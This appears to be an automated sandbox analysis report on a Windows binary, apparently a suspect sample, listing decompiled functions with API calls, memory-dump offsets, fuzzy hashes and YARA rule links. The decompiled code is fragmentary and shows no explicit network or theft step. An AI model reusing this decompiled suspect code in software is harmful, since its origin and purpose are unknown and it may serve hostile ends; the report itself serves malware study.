Opcode ID: 55f3203ac2281a1ec41b342400ea716fc5b22c9b58ac872abc52a4f8baac8068
Instruction ID: 009b1fc1bd870bdf6e325b969b9439ce19f4dfb7f312596acc69553d05baccc6
Opcode Fuzzy Hash: 55f3203ac2281a1ec41b342400ea716fc5b22c9b58ac872abc52a4f8baac8068
Instruction Fuzzy Hash: 3D21287250061EAFDF119F94EC84CEF3FA9FB14361B108425FE1596160E7329D60AFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C55088C, Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6C550898

Part of subcall function 6C547276: __FF_MSGBANNER.LIBCMT ref: 6C54728D
Part of subcall function 6C547276: __NMSG_WRITE.LIBCMT ref: 6C547294
Part of subcall function 6C547276: RtlAllocateHeap.NTDLL(6D56935C,00000000,00000001), ref: 6C5472B9

_free.LIBCMT ref: 6C5508AB

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 4b4cd3f7d2d704ebf9b710c087a62456599292fd4527b414f0bfde2a518df8e8
Instruction ID: 769f1eab436e2ce4118b27321232a20ba578d820adf8f7ba1b35b09306f86845
Opcode Fuzzy Hash: 4b4cd3f7d2d704ebf9b710c087a62456599292fd4527b414f0bfde2a518df8e8
Instruction Fuzzy Hash: E411C172949395EBEF106B789C04B9A3BB59F813ACB558527F81486E50DF348864CAD0

Uniqueness

Uniqueness Score: -1.00%

Function 00502A18, Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00502A18(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x50a2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0x50a2b4 = _t4;
				_t6 = GetCurrentProcessId();
				 *0x50a2b0 = _t6;
				 *0x50a2bc = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0x50a2ac = _t7;
				if(_t7 == 0) {
					 *0x50a2ac =  *0x50a2ac | 0xffffffff;
				}
				return 0;
			}

0x00502a20
0x00502a28
0x00502a2d
0x00000000
0x00502a7a
0x00502a2f
0x00502a37
0x00502a77
0x00000000
0x00502a77
0x00502a39
0x00502a3e
0x00502a50
0x00502a55
0x00502a5b
0x00502a63
0x00502a68
0x00502a6a
0x00502a6a
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0050446F,?,?,00000001), ref: 00502A20
GetVersion.KERNEL32(?,00000001), ref: 00502A2F
GetCurrentProcessId.KERNEL32(?,00000001), ref: 00502A3E
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 00502A5B
GetLastError.KERNEL32(?,00000001), ref: 00502A7A

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 1eb3ec5e3aea4462ea7a05ff845469605bb08fcfd33cce308a2781943cd098a1
Instruction ID: 77b605879d651020a8399b522ac2d800151ca519abac9e4b7470c2ecb6a85460
Opcode Fuzzy Hash: 1eb3ec5e3aea4462ea7a05ff845469605bb08fcfd33cce308a2781943cd098a1
Instruction Fuzzy Hash: B0F03A78B95302AFE3209F75AD1D71D3EA5B764740F108529E246C52E5DBB14408EF1A

Uniqueness

Uniqueness Score: -1.00%

Function 6C556762, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 6C556779
_wcscmp.LIBCMT ref: 6C55678A

Strings

ACP, xrefs: 6C556773
OCP, xrefs: 6C556784

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: _wcscmp
String ID: ACP$OCP
API String ID: 856254489-711371036
Opcode ID: f7335fd3aa7969d6611c221d24ea7760a8b49a2134abef43f3f83c60178e6252
Instruction ID: e32e385c8bb73fe654b9a52975f30fe24852345029cc45bad2e47c01f4767da8
Opcode Fuzzy Hash: f7335fd3aa7969d6611c221d24ea7760a8b49a2134abef43f3f83c60178e6252
Instruction Fuzzy Hash: 9801C032215345BEFB009A59DC85FDA33EC9F0076CF808427F904EAB81FB30DAA48294

Uniqueness

Uniqueness Score: -1.00%

Function 005013B4, Relevance: 6.2, APIs: 4, Instructions: 152
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E005013B4(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x50a2d0; // 0x2add5a8
					_t5 = _t102 + 0x50b038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x5092d0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x50a2d0; // 0x2add5a8
												_t28 = _t108 + 0x50b0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x50a2d0; // 0x2add5a8
														_t33 = _t78 + 0x50b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}

0x005013b9
0x005013c2
0x005013c3
0x005013c7
0x005013cd
0x005013d3
0x005013dc
0x005013e2
0x005013ec
0x005013ee
0x005013f4
0x005013f9
0x00501404
0x0050140c
0x0050140f
0x00501532
0x00501415
0x00501415
0x00501422
0x00501428
0x0050142e
0x00501432
0x00501438
0x00501445
0x00501449
0x0050144f
0x00501452
0x00501458
0x0050145e
0x00501464
0x00501467
0x0050146a
0x00501470
0x00501479
0x0050147f
0x00501480
0x00501483
0x00501484
0x00501485
0x0050148d
0x0050148e
0x0050148f
0x00501491
0x00501495
0x00501499
0x00000000
0x00000000
0x0050149f
0x005014a8
0x005014ae
0x005014b8
0x005014bc
0x005014be
0x005014cb
0x005014cf
0x005014d7
0x005014dc
0x005014ee
0x005014f0
0x005014f6
0x005014f6
0x005014ff
0x005014ff
0x00501501
0x00501507
0x00501507
0x0050150a
0x00501510
0x00501513
0x0050151c
0x00000000
0x00000000
0x00000000
0x0050151c
0x00501470
0x0050146a
0x00501452
0x00501522
0x00501522
0x00501528
0x00501528
0x0050152e
0x0050152e
0x00501537
0x0050153d
0x0050153d
0x005013f9
0x00501546

APIs

SysAllocString.OLEAUT32(005092D0), ref: 00501404
lstrcmpW.KERNEL32(00000000,0076006F), ref: 005014E6
SysFreeString.OLEAUT32(00000000), ref: 005014FF
SysFreeString.OLEAUT32(?), ref: 0050152E

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 45ac9ef248c0f14181fc9701f5cb3e2145cabf53ba3b730bd1276c7945aeb71b
Instruction ID: d7ee52f42c5acf68f6120e6320f6aebaefde6f38f6939f15676d79133e8a9c02
Opcode Fuzzy Hash: 45ac9ef248c0f14181fc9701f5cb3e2145cabf53ba3b730bd1276c7945aeb71b
Instruction Fuzzy Hash: 3E511D75D0090ADFCB11DBA8C8888AEB7B9FFC9704B144594E916EF265D7319D01CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C542319, Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

__Getcvt.LIBCPMT ref: 6C542371
MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000002,?,00000000,00000000,00000001,?), ref: 6C5423BF
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,00000000,00000001,?), ref: 6C542435
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,00000000,00000001,?), ref: 6C54245D

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: ByteCharMultiWide$Getcvt
String ID:
API String ID: 3195005509-0
Opcode ID: ccfb7a2dbcabca4432941706282d95a7fcd6bcc8e117dfb57790cc9a4e8976ff
Instruction ID: 368c42ebfee037e389d4d3dc3f377a64b62501de662ef2be758ff76a58f0bcb2
Opcode Fuzzy Hash: ccfb7a2dbcabca4432941706282d95a7fcd6bcc8e117dfb57790cc9a4e8976ff
Instruction Fuzzy Hash: 8641D13160436AEFDB158F65CC48B6E7BBAAF42315F15C529F854DBA80D770E884CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00501E91, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00501E91(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E00505278(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00502399(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E00503C32(_t101,  &_v428, _a8, _t96 - _t81);
					E00503C32(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E00502399(_t101,  &E0050A188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00502399(_a16, _a4);
						E0050114C(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00507F56();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00507F50();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E00505381(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E005045B4(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00505936(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E0050A188) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x00501e94
0x00501ea0
0x00501ea6
0x00501eab
0x00501eaf
0x00502021
0x00502025
0x00502025
0x00501eb5
0x00501eb9
0x00501ebf
0x00501ec0
0x00501ecb
0x00501ed1
0x00501ed6
0x00501ed9
0x00501ef3
0x00501f02
0x00501f0e
0x00501f18
0x00501f1d
0x00501f1f
0x00501f22
0x00501fd9
0x00501fdf
0x00501ff0
0x00502003
0x00502019
0x00000000
0x0050201e
0x00501f2b
0x00501f32
0x00501f36
0x00501f3c
0x00501f3e
0x00501f40
0x00501f42
0x00501f44
0x00501f4e
0x00501f53
0x00501f55
0x00501f57
0x00501f58
0x00501f59
0x00501f5a
0x00501f61
0x00501f68
0x00501f6b
0x00501f6b
0x00501f38
0x00501f38
0x00501f38
0x00501f73
0x00501f7b
0x00501f87
0x00501f8c
0x00501f8c
0x00501f91
0x00000000
0x00000000
0x00501f93
0x00501f96
0x00501fa3
0x00000000
0x00000000
0x00501fa5
0x00501fa5
0x00501fb2
0x00501f8c
0x00501f91
0x00000000
0x00000000
0x00000000
0x00501f91
0x00501fbc
0x00501fbf
0x00501fc2
0x00501fc9
0x00501fc9
0x00501fd6
0x00000000
0x00501fd6
0x00501ec2
0x00501ec6
0x00501ec7
0x00501ec9
0x00000000
0x00000000
0x00000000
0x00501ec9
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 00501F44
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00501F5A
memset.NTDLL ref: 00502003
memset.NTDLL ref: 00502019

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 7bf336c58bf99480f7c90a346c1bbe4bac932f200baf146395987f9c4529b129
Instruction ID: 98ded4d5207a576f2454746d9e09bd605d0f00ef0d0246290f08ebeab5aa2ba2
Opcode Fuzzy Hash: 7bf336c58bf99480f7c90a346c1bbe4bac932f200baf146395987f9c4529b129
Instruction Fuzzy Hash: 2C41A071A0061AAFDB20DF68CC49BEE7B79BF85310F004569B909A72C1EB709E458B91

Uniqueness

Uniqueness Score: -1.00%

Function 6C547BF3, Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6C547C89
__flush.LIBCMT ref: 6C547CA9
__write.LIBCMT ref: 6C547CDC
__flsbuf.LIBCMT ref: 6C547D0A

Part of subcall function 6C547183: __getptd_noexit.LIBCMT ref: 6C547183

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: f01a4516b64690ff8ae3e7e02d86db52a69eca7b0c6003d6e55d65bf10e5dcfe
Instruction ID: 076f22894ae71d492647b2c662552c02d69159ee23f0aeea712e0f25032e28c5
Opcode Fuzzy Hash: f01a4516b64690ff8ae3e7e02d86db52a69eca7b0c6003d6e55d65bf10e5dcfe
Instruction Fuzzy Hash: E141C631B056059BDB18CF69CC905AE77A6EF913A8B21CA3DE815C7A40E770DD85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0050467C, Relevance: 6.1, APIs: 4, Instructions: 108
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E0050467C(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				char* _t40;
				long _t41;
				intOrPtr _t45;
				intOrPtr* _t46;
				char _t48;
				char* _t53;
				long _t54;
				intOrPtr* _t55;
				void* _t64;

				_t64 = __eax;
				_t40 =  &_v12;
				_v8 = 0;
				_v16 = 0;
				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40);
				if(_t40 == 0) {
					_t41 = GetLastError();
					_v8 = _t41;
					if(_t41 != 0x2efe) {
						L26:
						return _v8;
					}
					_v8 = 0;
					L25:
					 *((intOrPtr*)(_t64 + 0x30)) = 0;
					goto L26;
				}
				if(_v12 == 0) {
					goto L25;
				}
				_push( &_v24);
				_push(1);
				_push(0);
				if( *0x50a148() != 0) {
					_v8 = 8;
					goto L26;
				}
				_t45 = E00505C4E(0x1000);
				_v20 = _t45;
				if(_t45 == 0) {
					_v8 = 8;
					L21:
					_t46 = _v24;
					 *((intOrPtr*)( *_t46 + 8))(_t46);
					goto L26;
				} else {
					goto L4;
				}
				do {
					while(1) {
						L4:
						_t48 = _v12;
						if(_t48 >= 0x1000) {
							_t48 = 0x1000;
						}
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
						if(_t48 == 0) {
							break;
						}
						_t55 = _v24;
						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
						_t17 =  &_v12;
						 *_t17 = _v12 - _v16;
						if( *_t17 != 0) {
							continue;
						}
						L10:
						if(WaitForSingleObject( *0x50a2c4, 0) != 0x102) {
							_v8 = 0x102;
							L18:
							E00502A03(_v20);
							if(_v8 == 0) {
								_v8 = E00506589(_v24, _t64);
							}
							goto L21;
						}
						_t53 =  &_v12;
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53);
						if(_t53 != 0) {
							goto L15;
						}
						_t54 = GetLastError();
						_v8 = _t54;
						if(_t54 != 0x2f78 || _v12 != 0) {
							goto L18;
						} else {
							_v8 = 0;
							goto L15;
						}
					}
					_v8 = GetLastError();
					goto L10;
					L15:
				} while (_v12 != 0);
				goto L18;
			}

0x00504684
0x00504687
0x00504690
0x00504693
0x00504696
0x0050469e
0x0050479c
0x005047a7
0x005047aa
0x005047b2
0x005047b9
0x005047b9
0x005047ac
0x005047af
0x005047af
0x00000000
0x005047af
0x005046a7
0x00000000
0x00000000
0x005046b0
0x005046b1
0x005046b3
0x005046bc
0x00504793
0x00000000
0x00504793
0x005046c8
0x005046cf
0x005046d2
0x00504781
0x00504788
0x00504788
0x0050478e
0x00000000
0x00000000
0x00000000
0x00000000
0x005046d8
0x005046d8
0x005046d8
0x005046d8
0x005046dd
0x005046df
0x005046df
0x005046ec
0x005046f4
0x00000000
0x00000000
0x005046f6
0x00504703
0x00504709
0x00504709
0x0050470c
0x00000000
0x00000000
0x00504719
0x0050472d
0x00504763
0x00504766
0x00504769
0x00504771
0x0050477c
0x0050477c
0x00000000
0x00504771
0x0050472f
0x00504736
0x0050473e
0x00000000
0x00000000
0x00504740
0x0050474b
0x0050474e
0x00000000
0x00504755
0x00504755
0x00000000
0x00504755
0x0050474e
0x00504716
0x00000000
0x00504758
0x00504758
0x00000000

APIs

GetLastError.KERNEL32 ref: 0050479C

Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A

GetLastError.KERNEL32 ref: 00504710
WaitForSingleObject.KERNEL32(00000000), ref: 00504720
GetLastError.KERNEL32 ref: 00504740

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorLast$AllocateHeapObjectSingleWait
String ID:
API String ID: 35602742-0
Opcode ID: 11bd46ae6fa82b03bc34a13868eb11942c58d37be7a4c39c4fa113d493443214
Instruction ID: 6e5f08f4743b9139c5a4ce280a462027a1f5a5cc5f14e899c21a6447e65b698e
Opcode Fuzzy Hash: 11bd46ae6fa82b03bc34a13868eb11942c58d37be7a4c39c4fa113d493443214
Instruction Fuzzy Hash: E94119B4901209EFDF10DFA4C9889AEBFB9FB55340F604469E602E71A1E7309E45EF51

Uniqueness

Uniqueness Score: -1.00%

Function 0050514D, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 97stringCOMMON

Download Yara Rule

APIs

lstrcmp.KERNEL32(00000001,00000001), ref: 005051FE
lstrlen.KERNEL32(00000001,005092D8,00000028,0050534C,00000000), ref: 00505209

Strings

LSP, xrefs: 005051CB
(LSP, xrefs: 005051CE

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcmplstrlen
String ID: (LSP$LSP
API String ID: 898299967-3527286715
Opcode ID: cf01ddacae7994589fe21d873ebf957a4698f1181e2ec4962340c37b100a8a42
Instruction ID: 1ae3c29f2e706af512f4975c15c8233b104e39f4304075dda6aa5967d75e4219
Opcode Fuzzy Hash: cf01ddacae7994589fe21d873ebf957a4698f1181e2ec4962340c37b100a8a42
Instruction Fuzzy Hash: 63411A75905A06DFCB18CFA9D8846AEBBF1BF59300B18892ED446A7291E730A985CF14

Uniqueness

Uniqueness Score: -1.00%

Function 6C552328, Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6C55235E
__isleadbyte_l.LIBCMT ref: 6C55238C
MultiByteToWideChar.KERNEL32(00000000,00000009,00000040,00000001,?,00000000), ref: 6C5523BA
MultiByteToWideChar.KERNEL32(00000000,00000009,00000040,00000001,?,00000000), ref: 6C5523F0

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 7a72e7cddda788c7839d0ef1ed5832f63bab5cfdf505fbcfafb96bba24e32371
Instruction ID: 5a80abe2180239740689a8a7b1b4d1af9a2c6f97a7984e8a00b659925f0fcf83
Opcode Fuzzy Hash: 7a72e7cddda788c7839d0ef1ed5832f63bab5cfdf505fbcfafb96bba24e32371
Instruction Fuzzy Hash: 7731F230601246EFDB15CF25CC48BAE7BB5FF41314F56452AE8249B9A0E730D8A1DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00507289, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00507289(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E00502616(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E005028B8(_t23);
						}
					}
					return _t38;
				}
				if(E00504380(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x50a2d4, 1, 0,  *0x50a394);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00507360(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E0050202E(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00503EFA(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00504CD5( &_v32, _t39);
					goto L13;
				}
			}

0x00507289
0x00507296
0x0050729c
0x0050729d
0x0050729e
0x0050729f
0x005072a0
0x005072a4
0x005072b0
0x005072b4
0x0050733c
0x0050733c
0x0050733f
0x00507341
0x00507349
0x0050734f
0x00507352
0x00507352
0x0050734f
0x0050735d
0x0050735d
0x005072c7
0x005072c9
0x005072c9
0x005072e0
0x005072e4
0x005072e7
0x005072f2
0x005072f9
0x005072f9
0x00507305
0x00507306
0x00507314
0x00507308
0x00507308
0x00507309
0x0050730a
0x0050730b
0x0050730c
0x0050730d
0x0050730d
0x00507319
0x0050731e
0x00507320
0x00507322
0x00507322
0x00507329
0x00000000
0x0050732b
0x0050732b
0x00507338
0x00000000
0x00507338

APIs

CreateEventA.KERNEL32(0050A2D4,00000001,00000000,00000040,?,?,73BCF710,00000000,73BCF730,?,?,?,?,00501C40,?,00000001), ref: 005072DA
SetEvent.KERNEL32(00000000,?,?,?,?,00501C40,?,00000001,00502F7D,00000002,?,?,00502F7D), ref: 005072E7
Sleep.KERNEL32(00000BB8,?,?,?,?,00501C40,?,00000001,00502F7D,00000002,?,?,00502F7D), ref: 005072F2
CloseHandle.KERNEL32(00000000,?,?,?,?,00501C40,?,00000001,00502F7D,00000002,?,?,00502F7D), ref: 005072F9

Part of subcall function 00507360: WaitForSingleObject.KERNEL32(00000000,?,?,?,00507319,?,00507319,?,?,?,?,?,00507319,?), ref: 0050743A
Part of subcall function 00507360: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00507319,?,?,?,?,?,00501C40,?), ref: 00507462

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseEvent$CreateHandleObjectSingleSleepWait
String ID:
API String ID: 467273019-0
Opcode ID: 09ee71289984c942b85821d43a4168e3184bf30c7b28c969a8a84e73065e5bf8
Instruction ID: 17f73fe9f00533af79ff600da513855ad15e733eab92633bc4c98a598608d6a5
